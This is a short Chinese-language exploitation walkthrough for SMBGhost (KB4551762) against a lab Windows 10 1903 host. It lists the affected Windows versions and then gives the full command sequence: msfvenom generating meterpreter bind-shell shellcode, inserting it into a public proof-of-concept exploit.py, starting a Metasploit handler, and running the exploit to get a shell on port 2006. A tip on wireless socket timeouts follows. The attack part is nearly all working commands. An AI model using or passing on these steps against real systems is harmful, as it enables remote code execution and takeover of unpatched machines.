环境:
目标:192.168.107.74,windows10专业版 1903
攻击者:192.168.103.61
影响版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)对应补丁:
KB4551762
第一步:
使用MSF生成python版本反弹的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2006 -f py -o evil.py
第二步:
将evil.py脚本中的payload替换掉SMBGhost_RCE_PoC文件夹下,exploit.py中的USER_PAYLOAD部分;同时用MSF开启正向监听:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.107.74
set lport 2006
run
第三步:
#攻击,脚本打开目标2006端口,从而msf能连上去。
python3 exploit.py -ip 192.168.107.74
#遇到的小问题:当环境处于无线局域网,会一直报socket超时错误,当环境处于有线局域网,则正常。